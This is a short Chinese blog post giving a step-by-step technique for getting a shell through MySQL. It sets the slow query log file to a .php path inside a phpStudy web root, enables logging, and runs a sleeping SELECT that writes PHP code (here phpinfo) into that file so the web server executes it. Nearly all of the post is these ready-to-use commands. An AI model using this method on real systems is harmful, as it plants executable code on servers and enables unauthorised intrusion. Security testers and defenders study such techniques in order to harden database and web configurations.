[Shell]MySql慢查询日志GetShell

通过开启慢查询日志,配置可解析日志文件GETSHELL。

MySQL的慢查询日志是MySQL提供的一种日志记录,它用来记录在MySQL中响应时间超过阀值的语句。

long_query_time的默认值为10,意思是运行10S以上的语句。

该值可以指定为微秒的分辨率。具体指运行时间超过long_query_time值的SQL,则会被记录到慢查询日志中。

对日志量庞大,直接访问日志网页极有可能出现500错误。

通过访问这种慢查询的日志文件GETSHELL确实是一种帮助。

show variables like '%slow%';
set GLOBAL slow_query_log_file='C:/phpStudy/PHPTutorial/WWW/slow.php';
set GLOBAL slow_query_log=on;
set GLOBAL log_queries_not_using_indexes=on;

select '<?php phpinfo();?>' from mysql.db where sleep(10);

posted @ 2019-10-15 14:46  肖洋肖恩、  阅读(2466)  评论(0编辑  收藏  举报
jQuery火箭图标返回顶部代码